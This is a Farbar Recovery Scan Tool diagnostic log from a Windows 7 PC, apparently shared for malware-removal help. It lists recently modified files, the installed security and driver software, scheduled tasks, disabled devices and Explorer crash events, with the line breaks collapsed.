2014-08-06 21:06 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll2014-08-19 22:07 - 2014-08-06 21:01 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll2014-08-19 22:07 - 2014-07-13 21:02 - 01216000 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll2014-08-19 22:07 - 2014-07-13 20:40 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll2014-08-15 04:51 - 2014-08-15 04:51 - 00000000 ____D () C:\Program Files\ASUS2014-08-12 06:17 - 2014-08-12 06:17 - 00000726 _____ () C:\Users\Matthew Daubenspeck\Desktop\Cleaner.exe - Shortcut.lnk2014-08-12 06:05 - 2014-08-12 06:05 - 00000000 ____D () C:\ProgramData\ASUS2014-08-12 04:35 - 2014-08-12 04:35 - 00001600 _____ () C:\Users\Matthew Daubenspeck\Desktop\AsusSetup.exe - Shortcut.lnk2014-08-05 03:13 - 2014-08-05 03:13 - 00002988 _____ () C:\Users\Matthew Daubenspeck\Documents\AUGUST2014.reg ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-04 20:06 - 2014-09-04 20:06 - 00000000 ____D () C:\FRST2014-09-04 20:06 - 2014-06-12 13:51 - 00000924 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job2014-09-04 20:05 - 2014-09-04 07:02 - 00067656 _____ () C:\Windows\WindowsUpdate.log2014-09-04 20:05 - 2014-06-12 07:43 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-09-04 20:00 - 2009-07-13 23:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A02014-09-04 20:00 - 2009-07-13 23:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A02014-09-04 19:58 - 2014-06-18 17:38 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job2014-09-04 19:58 - 2009-07-14 00:13 - 00783158 _____ () C:\Windows\system32\PerfStringBackup.INI2014-09-04 19:53 - 2014-06-12 13:51 - 00000920 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job2014-09-04 19:53 - 2014-06-12 00:19 - 00000000 ____D () C:\ProgramData\Kaspersky Lab2014-09-04 19:52 - 2014-09-04 16:56 - 00000224 _____ () C:\Windows\setupact.log2014-09-04 19:52 - 2014-08-30 02:33 - 00000000 ____D () C:\ProgramData\NVIDIA2014-09-04 19:52 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-09-04 19:49 - 2014-03-14 18:45 - 00000000 ____D () C:\Users\Matthew Daubenspeck\AppData\Local\NVIDIA Corporation2014-09-04 19:49 - 2014-03-14 18:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation2014-09-04 19:49 - 2014-03-14 18:43 - 00000000 ____D () C:\ProgramData\NVIDIA Corporation2014-09-04 19:49 - 2014-03-14 18:43 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation2014-09-04 19:49 - 2014-03-14 18:42 - 00000000 ____D () C:\Program Files\NVIDIA Corporation2014-09-04 19:28 - 2014-09-04 19:28 - 00058832 _____ () C:\Users\Matthew Daubenspeck\AppData\Local\GDIPFONTCACHEV1.DAT2014-09-04 16:56 - 2014-09-04 16:56 - 00269128 _____ () C:\Windows\system32\FNTCACHE.DAT2014-09-04 16:56 - 2014-09-04 16:56 - 00000000 _____ () C:\Windows\setuperr.log2014-09-04 07:20 - 2014-09-04 07:20 - 00000643 _____ () C:\Users\Matthew Daubenspeck\Desktop\JRT.txt2014-09-04 07:14 - 2014-08-28 03:18 - 00000000 ____D () C:\AdwCleaner2014-09-04 07:01 - 2014-09-04 06:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware2014-09-04 06:51 - 2014-09-04 06:51 - 00000862 _____ () C:\Users\Public\Desktop\SUPERAntiSpyware Professional.lnk2014-09-04 06:51 - 2014-09-04 06:51 - 00000538 _____ () C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 76f5f907-df54-4db7-8cca-e9da5ee3a2b2.job2014-09-04 06:51 - 2014-09-04 06:51 - 00000538 _____ () C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 138cf3f9-f67a-4f49-9f2a-da614f7f040b.job2014-09-04 06:51 - 2014-09-04 06:51 - 00000000 ____D () C:\Users\Matthew Daubenspeck\AppData\Roaming\SUPERAntiSpyware.com2014-09-04 06:51 - 2014-09-04 06:51 - 00000000 ____D () C:\ProgramData\SUPERAntiSpyware.com2014-09-04 06:18 - 2014-09-04 06:18 - 00001588 _____ () C:\Users\Matthew Daubenspeck\Desktop\firefox.exe - Shortcut.lnk2014-09-04 06:12 - 2014-09-04 06:12 - 00001058 _____ () C:\Users\Matthew Daubenspeck\Desktop\SUPERAntiSpyware.exe - Shortcut.lnk2014-09-04 05:02 - 2014-06-14 05:22 - 00000000 ____D () C:\Windows\pss2014-09-04 02:46 - 2014-03-15 10:40 - 00000000 ____D () C:\Temp2014-09-04 02:45 - 2009-07-13 21:34 - 00450709 ____R () C:\Windows\system32\Drivers\etc\hosts.20140904-024704.backup2014-09-04 02:43 - 2009-07-13 21:34 - 00000938 ____R () C:\Windows\system32\Drivers\etc\hosts.20140904-024528.backup2014-09-04 01:24 - 2014-08-29 22:17 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-09-04 01:24 - 2009-07-13 21:34 - 00450709 ____R () C:\Windows\system32\Drivers\etc\hosts.20140904-024307.backup2014-09-04 00:36 - 2014-09-04 00:36 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 22014-09-04 00:31 - 2014-09-04 00:31 - 00001054 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk2014-09-04 00:31 - 2014-09-04 00:31 - 00001054 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk2014-09-04 00:31 - 2014-09-04 00:31 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking2014-09-04 00:31 - 2014-09-04 00:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 22014-09-03 21:57 - 2014-09-03 21:57 - 00000404 _____ () C:\Users\Matthew Daubenspeck\Documents\cc_20140903_215716.reg2014-09-03 21:54 - 2014-08-28 06:02 - 00000000 ____D () C:\ProgramData\HitmanPro2014-09-03 21:48 - 2014-09-03 21:48 - 00001231 _____ () C:\Users\Matthew Daubenspeck\Desktop\HitmanPro_x64.exe - Shortcut.lnk2014-09-03 11:14 - 2014-06-13 01:28 - 00000000 ____D () C:\ProgramData\Malwarebytes Anti-Exploit2014-09-03 06:08 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF2014-08-30 05:58 - 2014-06-18 17:38 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater2014-08-30 05:58 - 2014-03-14 17:29 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe2014-08-30 05:58 - 2011-08-24 17:52 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl2014-08-30 02:33 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Help2014-08-28 09:48 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\AppCompat2014-08-28 06:03 - 2014-08-28 06:03 - 00000000 ____D () C:\Program Files\HitmanPro2014-08-28 03:44 - 2014-08-28 03:44 - 00001070 _____ () C:\Users\Matthew Daubenspeck\Documents\byteTHIS.txt2014-08-28 03:29 - 2014-08-28 03:29 - 00000000 ____D () C:\Windows\ERUNT2014-08-28 03:28 - 2009-07-14 00:08 - 00032636 _____ () C:\Windows\Tasks\SCHEDLGU.TXT2014-08-25 09:01 - 2014-08-25 01:39 - 02621440 _____ () C:\Windows\SysWOW64\㩣灜潲牧浡慤慴歜獡数獲祫氠扡慜灶㐱〮〮摜瑡屡潭畤敬彳湩敶瑮牯⹹慤2014-08-25 01:34 - 2014-08-25 01:34 - 00014220 _____ () C:\Users\Matthew Daubenspeck\Desktop\mrt.exe - Shortcut.lnk2014-08-23 05:02 - 2014-03-14 18:30 - 00000000 ____D () C:\Program Files (x86)\Intel2014-08-23 05:01 - 2014-08-23 05:02 - 00041984 _____ (Intel Corporation) C:\Windows\system32\Drivers\USB3Ver.dll2014-08-23 05:01 - 2013-12-20 16:38 - 00790512 _____ (Intel Corporation) C:\Windows\system32\Drivers\iusb3xhc.sys2014-08-23 05:01 - 2013-12-20 16:38 - 00369648 _____ (Intel Corporation) C:\Windows\system32\Drivers\iusb3hub.sys2014-08-23 05:01 - 2013-12-20 16:38 - 00020464 _____ (Intel Corporation) C:\Windows\system32\Drivers\iusb3hcs.sys2014-08-23 05:00 - 2014-08-23 05:00 - 00016640 _____ (http://www.asmedia.com.tw) C:\Windows\SysWOW64\Drivers\asmtufdriver.sys 2014-08-23 05:00 - 2014-07-11 04:12 - 00021400 _____ (http://www.asmedia.com.tw) C:\Windows\system32\Drivers\asmtufdriver.sys 2014-08-22 21:07 - 2014-08-27 21:53 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll2014-08-22 20:45 - 2014-08-27 21:53 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll2014-08-22 19:59 - 2014-08-27 21:53 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys2014-08-20 03:57 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache2014-08-20 01:34 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions2014-08-19 22:11 - 2014-06-12 13:52 - 00002192 _____ () C:\Users\Public\Desktop\Google Chrome.lnk2014-08-19 22:10 - 2014-03-14 17:42 - 00000000 ____D () C:\Windows\system32\MRT2014-08-19 22:10 - 2010-01-07 12:20 - 99218768 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe2014-08-19 22:08 - 2014-06-12 07:38 - 00000000 ___SD () C:\Windows\system32\CompatTel2014-08-19 01:45 - 2014-07-24 02:52 - 00000000 ____D () C:\Program Files (x86)\ASUS2014-08-18 04:44 - 2010-01-07 12:35 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information2014-08-15 05:14 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Registration2014-08-15 04:51 - 2014-08-15 04:51 - 00000000 ____D () C:\Program Files\ASUS2014-08-15 04:49 - 2014-07-24 02:50 - 00045074 _____ () C:\Windows\Ascd_tmp.ini2014-08-12 06:17 - 2014-08-12 06:17 - 00000726 _____ () C:\Users\Matthew Daubenspeck\Desktop\Cleaner.exe - Shortcut.lnk2014-08-12 06:05 - 2014-08-12 06:05 - 00000000 ____D () C:\ProgramData\ASUS2014-08-12 04:35 - 2014-08-12 04:35 - 00001600 _____ () C:\Users\Matthew Daubenspeck\Desktop\AsusSetup.exe - Shortcut.lnk2014-08-11 15:31 - 2014-08-30 02:32 - 01515296 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll2014-08-11 15:31 - 2014-08-30 02:32 - 00197408 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys2014-08-11 15:31 - 2014-08-30 02:32 - 00031520 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll2014-08-06 21:06 - 2014-08-19 22:07 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll2014-08-06 21:01 - 2014-08-19 22:07 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll2014-08-05 09:20 - 2010-01-06 19:20 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe2014-08-05 03:13 - 2014-08-05 03:13 - 00002988 _____ () C:\Users\Matthew Daubenspeck\Documents\AUGUST2014.reg2014-08-05 03:03 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signedC:\Windows\System32\wininit.exe => File is digitally signedC:\Windows\SysWOW64\wininit.exe => File is digitally signedC:\Windows\explorer.exe => File is digitally signedC:\Windows\SysWOW64\explorer.exe => File is digitally signedC:\Windows\System32\svchost.exe => File is digitally signedC:\Windows\SysWOW64\svchost.exe => File is digitally signedC:\Windows\System32\services.exe => File is digitally signedC:\Windows\System32\User32.dll => File is digitally signedC:\Windows\SysWOW64\User32.dll => File is digitally signedC:\Windows\System32\userinit.exe => File is digitally signedC:\Windows\SysWOW64\userinit.exe => File is digitally signedC:\Windows\System32\rpcss.dll => File is digitally signedC:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-08-27 00:12 ==================== End Of Log ============================Additional scan result of Farbar Recovery Scan Tool (x64) Version: 03-09-2014 02Ran by Matthew Daubenspeck at 2014-09-04 20:06:57Running from D:\Google Chrome DownloadsBoot Mode: Normal========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Kaspersky Internet Security (Enabled - Up to date) {179979E8-273D-D14E-0543-2861940E4886}AS: Kaspersky Internet Security (Enabled - Up to date) {ACF8980C-0107-DEC0-3FF3-1313EF89023B}AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}FW: Kaspersky Internet Security (Enabled) {2FA2F8CD-6D52-D016-2E1C-81546ADD0FFD} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)Adobe Flash Player 14 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)Adobe Reader XI (11.0.08) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.5.4.0 - Auslogics Labs Pty Ltd)Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 6.32.223.1 - Broadcom Corporation)CCleaner (HKLM\...\CCleaner) (Version: 4.14 - Piriform)Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) HiddenCisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) HiddenCisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) HiddenCreative Music Server (HKLM-x32\...\Music Server) (Version: 1.01 - Creative Technology Limited)Creative Smart Recorder (HKLM-x32\...\Smart Recorder) (Version: 2.20 - Creative Technology Limited)Creative WaveStudio 7 (HKLM-x32\...\WaveStudio 7) (Version: 7.14 - Creative Technology Limited)CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.0.2014 - CyberLink Corp.)CyberLink Power2Go 8 (x32 Version: 8.0.0.2014 - CyberLink Corp.) HiddenDolby Digital Live Pack (HKLM-x32\...\Dolby Digital Live Pack) (Version: 3.03 - Creative Technology Limited)DTS Connect Pack (HKLM-x32\...\DTS Connect Pack) (Version: 1.00 - Creative Technology Limited)Google Chrome (HKLM-x32\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) HiddenIntel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 15.4 - Intel)Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.3.34 - Intel Corporation)Intel® Trusted Connect Service Client (Version: 1.31.8.1 - Intel Corporation) HiddenKaspersky Internet Security (HKLM-x32\...\InstallWIX_{6F6873E3-5C92-4049-B511-231A138DD090}) (Version: 14.0.0.4651 - Kaspersky Lab)Kaspersky Internet Security (x32 Version: 14.0.0.4651 - Kaspersky Lab) HiddenMalwarebytes Anti-Exploit version 1.03.1.1220 (HKLM\...\Malwarebytes Anti-Exploit_is1) (Version: 1.03.1.1220 - Malwarebytes)Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) HiddenMicrosoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)NVIDIA Control Panel 340.52 (Version: 340.52 - NVIDIA Corporation) HiddenNVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)NVIDIA Install Application (Version: 2.1002.160.1244 - NVIDIA Corporation) HiddenNVIDIA PhysX (x32 Version: 9.13.1220 - NVIDIA Corporation) HiddenNVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.12.6514 - NVIDIA Corporation) HiddenPanda USB Vaccine 1.0.1.4 (HKLM-x32\...\{55A41219-9B22-4098-BAE7-AE289B3C569A}_is1) (Version: - Panda Security)Sound Blaster Z-Series (HKLM-x32\...\{143AECC2-5323-458C-8691-0F69277FE3B8}) (Version: 1.00.22 - Creative Technology Limited)Sound Blaster Z-Series Extras (HKLM-x32\...\{9D9DB4BA-E352-4AC8-AD2B-B10104F5AB80}) (Version: 1.0 - Creative Technology Limited)Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)SQLite ADO.NET 2.0/3.5 Provider (HKLM-x32\...\{00257FA9-3622-45E4-8B4B-A792CC5169EB}) (Version: 1.066.0 - Phoenix Software Solutions, LLC)SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1130 - SUPERAntiSpyware.com)WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.4700 - Broadcom Corporation) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) ==================== Restore Points ========================= ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2014-09-04 02:47 - 00000938 ____R C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {02249C66-258D-4757-A212-07A268F594A4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-08-30] (Adobe Systems Incorporated)Task: {06E5E0FB-0173-4301-912E-8535F6FE21D6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-06-12] (Google Inc.)Task: {897B0D21-5784-45BC-8F95-EB809D65F6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-06-12] (Google Inc.)Task: {A9E11B3F-801F-4699-AFDF-4CA3C88B0EF1} - System32\Tasks\CCleanerSkipUAC => D:\Program Files\CCleaner\CCleaner.exe [2014-05-20] (Piriform Ltd)Task: {B86735F4-96F8-4F57-AF0C-D6FCF7261D3F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => d:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exeTask: {BF642A3E-BF70-48F1-8DF9-912371AAEE98} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => d:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exeTask: {CF83B4B5-0C07-4803-B9FC-E8741FF18B53} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exeTask: {E8A335FB-D8F4-4E40-9790-B43813824E92} - System32\Tasks\PandaUSBVaccine => d:\Program Files (x86)\Panda USB Vaccine\RunInteractiveWin.exe [2009-09-23] ()Task: {F44E16D8-6375-4C66-84BD-87AA869AD0CB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => d:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exeTask: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exeTask: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 138cf3f9-f67a-4f49-9f2a-da614f7f040b.job => d:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exeTask: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 76f5f907-df54-4db7-8cca-e9da5ee3a2b2.job => d:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe ==================== Loaded Modules (whitelisted) ============= 2014-08-30 02:33 - 2014-07-02 13:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll2013-06-17 12:35 - 2013-06-17 12:35 - 00478400 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\dblite.dll2013-05-08 14:52 - 2013-05-08 14:52 - 01270464 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\kpcengine.2.3.dll2014-09-04 00:31 - 2014-05-13 12:04 - 00109400 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl2014-09-04 00:31 - 2014-05-13 12:04 - 00416600 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl2014-09-04 00:31 - 2014-05-13 12:04 - 00167768 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl2014-09-04 00:31 - 2012-08-23 10:38 - 00574840 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll2014-09-04 00:31 - 2012-04-03 17:06 - 00565640 _____ () d:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll2014-09-04 00:31 - 2014-05-13 12:04 - 00109400 _____ () D:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl2014-09-04 00:31 - 2014-05-13 12:04 - 00416600 _____ () D:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl2014-09-04 00:31 - 2014-05-13 12:04 - 00167768 _____ () D:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl2014-03-14 18:51 - 2012-06-07 22:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll2012-06-08 13:34 - 2012-06-08 13:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll2014-07-13 02:42 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ==================== Faulty Device Manager Devices ============= Name: Microsoft Virtual WiFi Miniport AdapterDescription: Microsoft Virtual WiFi Miniport AdapterClass Guid: {4d36e972-e325-11ce-bfc1-08002be10318}Manufacturer: MicrosoftService: vwifimpProblem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Bluetooth USB moduleDescription: Bluetooth USB moduleClass Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}Manufacturer: BroadcomService: BTHUSBProblem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors:==================Error: (09/04/2014 07:54:17 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: Explorer.EXE, version: 6.1.7601.17567, time stamp: 0x4d672ee4Faulting module name: SHELL32.dll, version: 6.1.7601.18517, time stamp: 0x53aa2e07Exception code: 0xc0000005Fault offset: 0x0000000000050506Faulting process id: 0x4f0Faulting application start time: 0xExplorer.EXE0Faulting application path: Explorer.EXE1Faulting module path: Explorer.EXE2Report Id: Explorer.EXE3 Error: (09/04/2014 07:49:17 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: nvstreamsvc.exe, version: 0.0.0.0, time stamp: 0x53e5680cFaulting module name: nvstreamsvc.exe, version: 0.0.0.0, time stamp: 0x53e5680cException code: 0x40000015Fault offset: 0x00000000002d6389Faulting process id: 0xec8Faulting application start time: 0xnvstreamsvc.exe0Faulting application path: nvstreamsvc.exe1Faulting module path: nvstreamsvc.exe2Report Id: nvstreamsvc.exe3 Error: (09/04/2014 07:37:49 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: Explorer.EXE, version: 6.1.7601.17567, time stamp: 0x4d672ee4Faulting module name: SHELL32.dll, version: 6.1.7601.18517, time stamp: 0x53aa2e07Exception code: 0xc0000005Fault offset: 0x0000000000050506Faulting process id: 0x788Faulting application start time: 0xExplorer.EXE0Faulting application path: Explorer.EXE1Faulting module path: Explorer.EXE2Report Id: Explorer.EXE3 System errors:=============Error: (09/04/2014 07:53:02 PM) (Source: Service Control Manager) (EventID: 7026) (User: )Description: The following boot-start or system-start driver(s) failed to load: ASMTFilter Error: (09/04/2014 04:56:48 PM) (Source: Service Control Manager) (EventID: 7026) (User: )Description: The following boot-start or system-start driver(s) failed to load: ASMTFilter Microsoft Office Sessions:=========================Error: (09/04/2014 07:54:17 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Explorer.EXE6.1.7601.175674d672ee4SHELL32.dll6.1.7601.1851753aa2e07c000000500000000000505064f001cfc8a3bc597043C:\Windows\Explorer.EXEC:\Windows\system32\SHELL32.dll292de5b7-3497-11e4-b8e5-60a44c65b479 